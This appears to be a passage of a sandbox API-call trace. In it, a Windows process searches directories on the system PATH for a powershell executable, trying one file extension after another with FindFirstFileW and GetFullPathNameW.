	[0876.918] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.918] SetErrorMode (uMode=0x1) returned 0x1
	[0876.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.919] SetErrorMode (uMode=0x1) returned 0x1
	[0876.919] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.919] SetErrorMode (uMode=0x1) returned 0x1
	[0876.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.919] SetErrorMode (uMode=0x1) returned 0x1
	[0876.920] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.920] SetErrorMode (uMode=0x1) returned 0x1
	[0876.920] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.920] SetErrorMode (uMode=0x1) returned 0x1
	[0876.920] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.921] SetErrorMode (uMode=0x1) returned 0x1
	[0876.921] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.921] SetErrorMode (uMode=0x1) returned 0x1
	[0876.921] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.921] SetErrorMode (uMode=0x1) returned 0x1
	[0876.921] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.922] SetErrorMode (uMode=0x1) returned 0x1
	[0876.922] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.922] SetErrorMode (uMode=0x1) returned 0x1
	[0876.922] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.922] SetErrorMode (uMode=0x1) returned 0x1
	[0876.922] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.923] SetErrorMode (uMode=0x1) returned 0x1
	[0876.923] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.923] SetErrorMode (uMode=0x1) returned 0x1
	[0876.923] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.924] SetErrorMode (uMode=0x1) returned 0x1
	[0876.924] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.924] SetErrorMode (uMode=0x1) returned 0x1
	[0876.924] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.924] SetErrorMode (uMode=0x1) returned 0x1
	[0876.925] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.925] SetErrorMode (uMode=0x1) returned 0x1
	[0876.925] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.925] SetErrorMode (uMode=0x1) returned 0x1
	[0876.925] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.926] SetErrorMode (uMode=0x1) returned 0x1
	[0876.926] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.926] SetErrorMode (uMode=0x1) returned 0x1
	[0876.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.926] SetErrorMode (uMode=0x1) returned 0x1
	[0876.926] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.927] SetErrorMode (uMode=0x1) returned 0x1
	[0876.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.927] SetErrorMode (uMode=0x1) returned 0x1
	[0876.927] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.927] SetErrorMode (uMode=0x1) returned 0x1
	[0876.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.928] SetErrorMode (uMode=0x1) returned 0x1
	[0876.928] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.928] SetErrorMode (uMode=0x1) returned 0x1
	[0876.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.928] SetErrorMode (uMode=0x1) returned 0x1
	[0876.929] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.929] SetErrorMode (uMode=0x1) returned 0x1
	[0876.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.929] SetErrorMode (uMode=0x1) returned 0x1
	[0876.929] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.930] SetErrorMode (uMode=0x1) returned 0x1
	[0876.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.930] SetErrorMode (uMode=0x1) returned 0x1
	[0876.930] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.930] SetErrorMode (uMode=0x1) returned 0x1
	[0876.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.931] SetErrorMode (uMode=0x1) returned 0x1
	[0876.931] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.931] SetErrorMode (uMode=0x1) returned 0x1
	[0876.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.931] SetErrorMode (uMode=0x1) returned 0x1
	[0876.931] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.932] SetErrorMode (uMode=0x1) returned 0x1
	[0876.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.932] SetErrorMode (uMode=0x1) returned 0x1
	[0876.932] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.932] SetErrorMode (uMode=0x1) returned 0x1
	[0876.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.932] SetErrorMode (uMode=0x1) returned 0x1
	[0876.932] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.933] SetErrorMode (uMode=0x1) returned 0x1
	[0876.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.933] SetErrorMode (uMode=0x1) returned 0x1
	[0876.933] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.933] SetErrorMode (uMode=0x1) returned 0x1
	[0876.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.933] SetErrorMode (uMode=0x1) returned 0x1
	[0876.934] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.934] SetErrorMode (uMode=0x1) returned 0x1
	[0876.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.934] SetErrorMode (uMode=0x1) returned 0x1
	[0876.934] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.934] SetErrorMode (uMode=0x1) returned 0x1
	[0876.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.956] SetErrorMode (uMode=0x1) returned 0x1
	[0876.956] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.956] SetErrorMode (uMode=0x1) returned 0x1
	[0876.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.957] SetErrorMode (uMode=0x1) returned 0x1
	[0876.957] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.957] SetErrorMode (uMode=0x1) returned 0x1
	[0876.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0876.957] SetErrorMode (uMode=0x1) returned 0x1
	[0876.957] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.958] SetErrorMode (uMode=0x1) returned 0x1
	[0876.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0876.958] SetErrorMode (uMode=0x1) returned 0x1
	[0876.958] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.958] SetErrorMode (uMode=0x1) returned 0x1
	[0876.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0876.959] SetErrorMode (uMode=0x1) returned 0x1
	[0876.959] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.959] SetErrorMode (uMode=0x1) returned 0x1
	[0876.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0876.960] SetErrorMode (uMode=0x1) returned 0x1
	[0876.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.960] SetErrorMode (uMode=0x1) returned 0x1
	[0876.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0876.960] SetErrorMode (uMode=0x1) returned 0x1
